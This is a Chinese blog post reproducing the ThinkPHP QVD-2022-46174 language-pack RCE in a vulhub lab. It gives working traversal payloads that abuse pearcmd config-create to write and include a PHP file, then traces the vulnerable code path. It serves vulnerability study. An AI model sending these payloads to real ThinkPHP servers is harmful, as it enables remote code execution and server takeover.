Thinkphp QVD-2022-46174 多语言rce

最新推荐文章于 2024-04-14 00:09:52 发布
最新推荐文章于 2024-04-14 00:09:52 发布
阅读量2k 收藏 2
点赞数
分类专栏: CVE复现 文章标签: 服务器 安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61768489/article/details/128729352
版权

文章目录

漏洞介绍

Thinkphp,v6.0.1~v6.0.13,v5.0.x,v5.1.x

如果 Thinkphp 程序开启了多语言功能,那就可以通过 get、header、cookie 等位置传入参数,实现目录穿越+文件包含,通过 pearcmd 文件包含这个 trick 即可实现 RCE。

文件包含漏洞存在的情况下还需要服务器满足下面两个条件才能利用:

  1. PHP环境开启了register_argc_argv
  2. PHP环境安装了pcel/pear

Docker默认的PHP环境恰好满足上述条件。所以先使用vulhub进行漏洞利用的复现

vulhub漏洞搭建

cd vulhub/thinkphp/lang-rce
编译环境
docker-compose build
运行环境
docker-compose up -d

访问 ip:8080

image-20230116155721851

漏洞利用

测试包含public/index.php文件来确认文件包含漏洞是否存在

?lang=../../../../../public/index

如果漏洞存在,则服务器会出错,返回500页面

image-20230116160441349

利用一:写入文件

利用pearcmd写入shell文件

?+config-create+/&lang=../../../../../../../../../../../usr/local/lib/php/pearcmd&/<?=phpinfo()?>+shell.php

image-20230116160912793

如果服务器返回pearcmd的命令行执行结果,说明漏洞利用成功

此时访问url/shell.php即可发现已经成功写入文件

image-20230116161039030

利用二:文件包含

使用pearcmd在/tmp文件夹下创建文件再进行包含,P神文章

?lang=../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?=phpinfo()?>+/tmp/shell.php

image-20230116164435443

?lang=../../../../../../../tmp/shell

image-20230116164451808

2023 realword ctf体验赛 中出现了这个利用方法

漏洞分析

TP6在路径app/middleware.php 开启多语言特性

image-20230116144503740

image-20230116144354708

测试漏洞成功

thinkphp程序初始化都会运行src/think/App.php里的initialize()方法

image-20230116174457963

函数中使用this->loadLangPack()获取语言包,跟进loadLangPack()方法

image-20230116175150102

却发现只有加载默认语言包的功能,换一条路

访问

?lang=../../../../../public/index

src/think/middleware/LoadLangPack.php 查看LoadLangPack.php

image-20230116175624231

在 middleware 的 handle() 函数会被调用,这里断在 LoadLangPack.phphandle()

跟进detect()方法

image-20230116175925115

可以看到依次排查了 GET["lang"]HEADER["think-lang"]COOKIE["think_lang"] ,并且将其不做任何过滤,直接赋值给了 $langSet

继续走下去

此时payload被赋值给为参数$langSet。回到loadLangPack函数,下一步执行

$this->request->setLangset($this->lang->range() ) 调用setLangset()

image-20230116203244436 image-20230116203256382

如果返回的 $langset 不等于默认的 langset

那么就会调用 $this->lang->switchLangSet($langset) ,正是在这里面实现了 文件包含

image-20230118114249426

跟进 switchLangSet() ,可以看到调用了 $this->load() ,而传入的参数直接拼接而成文件的路径

image-20230118120954457

继续跟进这个load()

image-20230118121256510

判断文件是否存在,把文件路径又调用给了parse(),跟进parse()

image-20230118121509577

可以看到进行了include文件包含, 造成文件包含漏洞

可以通过目录穿越实现任意 php 文件的包含,那么用 pearcmd 文件包含这个 trick ,就能 RCE 了

参考文章

https://xz.aliyun.com/t/11940

https://www.leavesongs.com/PENETRATION/docker-php-include-getshell.html

https://tttang.com/archive/1865/#toc_thinkphp-6

https://github.com/vulhub/vulhub/blob/master/thinkphp/lang-rce/README.zh-cn.md

ThnPkm
关注
专栏目录
ThinkPHP语言模块RCE漏洞复现
0xSec
12-25 3665
ThinkPHP,是为了简化企业级应用开发和敏捷WEB应用开发而诞生的开源轻量级PHP框架。最早诞生于2006年初,2007年元旦正式更名为ThinkPHP,并且遵循Apache2开源协议发布。ThinkPHP从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,也注重易用性。并且拥有众多原创功能和特性,在社区团队的积极参与下,在易用性、扩展性和性能方面不断优化和改进。
[ vulhub漏洞复现篇 ] ThinkPHP 5.0.23-Rce
qq_51577576的博客
10-02 2247
[ vulhub漏洞复现篇 ] ThinkPHP 5.0.23-Rce 漏洞复现 ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。
ThinkPHP语言模块文件包含RCE复现详细教程
ALLEN'Blog
02-14 2172
1、网络安全理论知识(2天)①了解行业相关背景,前景,确定发展方向。②学习网络安全相关法律法规。③网络安全运营的概念。④等保简介、等保规定、流程和规范。(非常重要)2、渗透测试基础(一周)①渗透测试的流程、分类、标准②信息收集技术:主动/被动信息搜集、Nmap工具、Google Hacking③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等3、操作系统基础(一周)
ThinkPHP语言文件包含RCE(QVD-2022-46174)
weixin_43610673的博客
01-10 2414
ThinkPHP6新版本补丁\think\middleware\LoadLangPack::detect`中增加了对url、Header、Cookie中设置语言的合法性检查。查看官方文档关于多语言的解释可见:会首先检查请求的URL或者Cookie中是否包含语言变量。在Docker任意版本镜像中,pcel/pear都会被默认安装,安装的路径在。需开启多语言选项,以thinkPHP6版本为例。方法会被自动加载(中间件的入口执行方法)在detect方法中设置语言之后进入。进行语言切换,路径直接拼接而成。
thinkphp lang命令执行(QVD-2022-46174)漏洞复现
weixin_54584489的博客
04-29 1339
ThinkPHP,是为了简化企业级应用开发和敏捷WEB应用开发而诞生的开源轻量级PHP框架。当ThinkPHP开启多语言功能,并且存在扩展pear时,攻击者可以构造lang参数实现远程代码执行。本次漏洞复现,是建立在前人的基础上的,整个过程没有遇到太大问题,总体收获就是感受了一把该漏洞,以及复习了前面学习到的一句话木马,同时扩展了一些小知识点。将思绪代入最初的漏洞发现者,才明白知识储备对挖洞者的重要性。
ThinkPHP Lang多语言本地文件包含漏洞(QVD-2022-46174)漏洞复现
qq1140037586的博客
12-17 2930
ThinkPHP是一个在中国使用较多的PHP框架。在其6.0.13版本及以前,存在一处本地文件包含漏洞。当ThinkPHP开启了多语言功能时,攻击者可以通过lang参数和目录穿越实现文件包含,当存在其他扩展模块如 pear 扩展时,攻击者可进一步利用文件包含实现远程代码执行。访问如下地址:http://xxx.xx.230.165:59502/public/index.php。使用vulfocus靶场复现漏洞,使用如下命令拉取镜像。
ThinkPHP Lang文件包含To远程代码执行漏洞复现—CNVD-2022-86535
afei001
12-14 1249
ThinkPHP是为了简化企业级应用开发和敏捷WEB应用开发而诞生的开源轻量级PHP框架。ThinkPHP存在命令执行漏洞,该漏洞是由于开启了多语言功能,对参数lang传参过滤不严谨,攻击者可利用该漏洞执行命令。本质是ThinkPHP在开启多语言功能的情况下存在文件包含漏洞,攻击者可以通过get、header、cookie等位置传入参数,ThinkPHP LoadLangPack中存在目录穿越漏洞,然后再利用pearcmd文件包含并结合它的指令config-create创建恶意代码,从而实现远程代码执行。
thinkphp-2x-rce 1 代码执行
weixin_51558394的博客
08-17 488
thinkphp-2x-rce 代码执行
thinkphp-2x-rce 代码执行
weixin_46580614的博客
08-20 868
thinkphp-2x-rce 代码执行 漏洞描述 ​ ThinkPHP框架 - 是由上海顶想公司开发维护的MVC结构的开源PHP框架,遵循Apache2开源协议发布,是为了敏捷WEB应用开发和简化企业应用开发而诞生的。 ThinkPHP ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞 影响版本 Thinkphp 2.x的版本 实验环境 攻击机:win10 靶机:vulfocus平台 thinkphp-2x-rce
漏洞通告ThinkPHP远程代码执行漏洞
05-05
【漏洞通告】ThinkPHP远程代码执行漏洞
【vulhub】thinkphp 2-rce 5.0.23-rce 5-rce in-sqlinjection lang-rce漏洞复现
qq_58873970的博客
09-07 486
----------------梦想,想像力和希望实现这些梦想的人的勇气充满希望。
漏洞深度分析|Thinkphp语言 RCE
LJQClqjc的博客
12-12 965
棱镜七彩漏洞深度分析
Vulhub复现--ThinkPHP框架系列(二)
tzyyyyyy的博客
04-27 289
Vulhub靶场关于ThinkPHP框架的漏洞复现
[Vulhub] ThinkPHP漏洞合集
weixin_45605352的博客
05-11 2849
0x01 复现环境 攻击机:kali linux,Windows 10 x64 靶机:XXE(下载链接https://www.vulnhub.com/entry/xxe-lab-1,254/) 网络设置:均为桥接模式 0x02 漏洞复现 主机发现&端口扫描 先确定靶机ip地址,这里用arp-scan -l命令探测内网: 发现靶机地址为192.168.43.228,接下来用nmap -sV -p- 192.168.43.228 扫描一下: -sV:探测端口服务版本;-p:指定端口;-v:显示扫描过
ThinkPHP漏洞合集(专注渗透视角)
LainWith的博客
04-11 8367
服务框架是指某领域一类服务的可复用设计与不完整的实现,与软件框架不同的是,服务框架同时体现着面向服务,一个服务框架可以分为两个主要部分:服务引擎、引入的外部服务。ThinkPHP,是为了简化企业级应用开发和敏捷WEB应用开发而诞生的开源轻量级PHP框架。可想而知框架连接着网络和系统接触着越来越多的关键数据,渐渐成为单位公共安全中最具有战略性的资产,框架的安全稳定运行也直接决定着业务系统能否正常使用。
ThinkPHP文件包含,远程执行漏洞分析
Fiverya的博客
12-13 1398
文件包含,代码执行漏洞,漏洞编号:QVD-2022-46174
ThinkPHP漏洞合集(专注渗透视角)_thinkphp v6,网络安全开发工程师面试题
最新发布
2401_83947105的博客
04-14 1101
*漏洞原理:**ThinkPHP是在中国使用极为广泛的PHP开发框架。在其版本5.0(
thinkphp日志泄漏漏洞_ThinkPHP5 远程命令执行漏洞分析
weixin_39975529的博客
01-12 932
前言ThinkPHP官方最近修复了一个严重的远程代码执行漏洞。这个主要漏洞原因是由于框架对控制器名没有进行足够的校验导致在没有开启强制路由的情况下可以构造恶意语句执行远程命令,受影响的版本包括5.0和5.1版本。测试环境:ThinkPHP 5.1 beta+ win10 64bit + wamp漏洞分析网上已经有些分析文章了,我就正向分析下这次漏洞过程。不同版本的ThinkPHP调用过程和代码会稍...
request获取int类型的值_启明星辰ADLab:ThinkPHP5核心类Request远程代码漏洞分析
weixin_39607935的博客
11-20 512
更多资讯和分析文章请关注启明星辰ADLab微信公众号及官方网站(adlab.venustech.com.cn)漏洞介绍2019年1月11日,ThinkPHP团队发布了一个补丁更新,修复了一处由于不安全的动态函数调用导致的远程代码执行漏洞。该漏洞危害程度非常高,默认条件下即可执行远程代码。启明星辰ADLab安全研究员对ThinkPHP的多个版本进行源码分析和验证后,确认具体受影响的版本为T...
thinkphp2-rce
07-28
ThinkPHP 2.x版本中存在远程代码执行(RCE)漏洞。该漏洞可以通过构造恶意的请求来执行任意的PHP代码。具体来说,漏洞出现在ThinkPHP框架中的路由处理函数中,使用了不安全的preg_replace函数,并且使用了/e模式进行...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值